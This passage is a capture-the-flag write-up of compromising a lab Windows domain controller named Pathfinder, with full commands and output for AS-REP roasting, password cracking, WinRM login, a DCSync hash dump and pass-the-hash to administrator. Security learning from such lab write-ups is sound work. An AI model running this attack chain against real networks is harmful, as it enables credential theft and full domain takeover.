TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021–09–11T17:34:17
|_ start_date: N/A

Well hello Domain Controller, have you come to tell me your secrets? Ok so there are a lot of services listening but the most important ones on a Domain Controller are usually: Server Message Block (SMB 445), Lightweight Directory Access Protocol (LDAP 389) and Kerberos (88). I did however immediately notice that port 53 TCP was open. Port 53 is used for DNS but you would normally only see it on UDP. If port 53 TCP is open then it usually means that the protocol is accepting DNS Zone transfer requests. Alas, hack failed, this one didn’t tell me anything.

└──╼ [★]$ dig axfr @10.10.10.30 MEGACORP
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.30 MEGACORP
; (1 server found)
;; global options: +cmd
; Transfer failed. :-(

So with that rabbit hole out the way it was time to look at Server Message Block. We need to see if it had been misconfigured to allow the listing of shares and stuff. I first ran enum4linux in hopes that it would give me some information. Honestly though, the tool just doesn’t seem to work that often. So next I used smbclient to see what was going on.

└──╼ [★]$ smbclient -L 10.10.10.30
Enter WORKGROUP\joe’s password:
Anonymous login successful
Sharename Type Comment
— — — — — — — — — — -

The Anonymous login was successful but there was nothing on there. Hmmm another dead end. Ok then, lets focus on LDAP and see what information we can interrogate out of it. At first I was getting nowhere. I got a bit of information out from the protocol using ldapsearch but nothing substantial.

└──╼ [★]$ sudo ldapsearch -x -h 10.10.10.30 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
dn:
namingcontexts: DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

User Enumeration Hack

So what was next? Well this is where I turned to the walkthrough written by h4rithd. Honestly I wouldn’t have gotten any further if it wasn’t for this walkthrough. So it turns out that the Sandra user on the Shield box was quite important. I should have learnt my lesson by now but as soon as I get the root flag, I log off write up. Sandra appears to exist on this box and we can use their credentials to do some enumeration. Enter ldapdomaindump, this tool is cool. Running ldapdomaindump with sandra’s credentials we get a bunch of html files containing information about the domain.

This shows users on the machine we want to hack
Domain users
This shows the groups on the machine we want to hack
Domain users by group
This shows the users on the machine we want to hack.
Kerberos DONT_REQ_PREAUTH

Foothold Hack

The one user that should grab our attention is the svc_bes as it doesn’t require Kerberos pre authentication. If pre authentication isn’t required, then we can trick Kerberos in to giving us an encrypted Ticket Granting Ticket hash. We can then hack or crack it offline. I’m getting ahead of myself, more about that later. So lets grab that TGT hash! Using the Impacket tool GetNPUsers.py we can request the TGT for the svc_bes user.

└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc_bes
[email protected]:c818cd9132de09878439dd73cc96a930$73b8ea1807114952f569afabd24391f25818660e8386fa926857af7d6382ad42d9d24e80300fcb43ebdcd40b2bbb9d13b462a83b5b87417e341625a146b503e89fdb18a6ff80fcce6fe776160e45cbf7a32978eee153d5f3b55539cef3c4ac56763811ce5d1b856afa9fce10fa3cdda54828ba2dc047f5109697ca0d0fecd3387421e328240c9b17a9567faa8be961ac30a739d56a1b66d9d5f6b1df01f7176382a7a483527cea0a8c2105a0812d142333b0412734eeee144d9be74c16cb1b3220e881819120a2691a825f19fbb9761d1c23cba03c8ed84ac4203a0706fa4e7fd947150e65ff7a78c0f4f051ad61bb49

Yummmm, don’t you just love the smell of hashes in the morning, or anytime for that matter. Ok so what’s next? Well we need to talk to our mate John and ask him to do the dirty work. No I don’t me kill him. I mean crack him really hard with a rock. Grab the hash output and chuck it in a file. Then using your favourite non escapable text editor vim, or nano. Then, tell John where your rock is and ask him politely to beat the secrets out of him.

└──╼ [★]$ sudo john beshash.txt — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Sheffield19 ([email protected])
1g 0:00:00:08 DONE (2021–09–11 12:22) 0.1157g/s 1227Kp/s 1227Kc/s 1227KC/s Sherbert!!..Shawnee
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Voila, the password is Sheffield19.

Story time, I once met Darren Kitchen from Hak5 in Sheffield when he was touring the UK on his motorcycle. I caught the train there from where I was staying for Uni and had a beer with him. Really cool guy but I couldn’t stay long as the last train was at midnight or something. Someone took a photo but I never got a copy. Hey photography man. If you’re out there, I would love the Picture of Darren and myself from the Hak5 Sheffield meet please.

Anyway, moving on. We now have the password and can use evil-winrm to hack in to the box and see what’s around.

└──╼ [★]$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05XXXXXXXXXXXXXXXXX37f1

Privilege Escalation Hack

Turns out what was around was the user flag and now we have successfully captured it. Ok so what’s next? We have a vaid set of credentials. Lets see if we can try and dump some secrets using the impacket tool secretsdump.py. This tool performs a DCSync hack against the machine due to the trust that is provided by the authenticated user. This means it is possible to use the domain replication privileges of the authenticated user to gather information from the domain. Including password hashes. For it to work though, we need to know If our user has domain replication privileges.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:[email protected]
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 — rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:9635702428c5134926387fa5db2010c8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1–96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1–96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1–96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1–96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1–96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1–96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1–96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1–96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1–96:753157a7307cc0c55569930f182edad660cc4492f27491efb6b8f6f1f7dd8824
PATHFINDER$:aes128-cts-hmac-sha1–96:e25b80d1951cd2410ac1ce2f446b63f4
PATHFINDER$:des-cbc-md5:25fbb06d258cd943
[*] Cleaning up…

We have an Administrator password hash. Lets be kind and pass it forward using psexec.py

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.30…..
[*] Found writable share ADMIN$
[*] Uploading file fpnaGrFs.exe
[*] Opening SVCManager on 10.10.10.30…..
[*] Creating service ovNb on 10.10.10.30…..
[*] Starting service ovNb…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights reserved.

He shoots, he scores, and for my final trick I will recover the root.txt flag.


C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
ee6XXXXXXXXXXXXXXXXX645
This shows that the machine we were trying to Hack has indeed been pwned!
Pathfinder has been Pwned!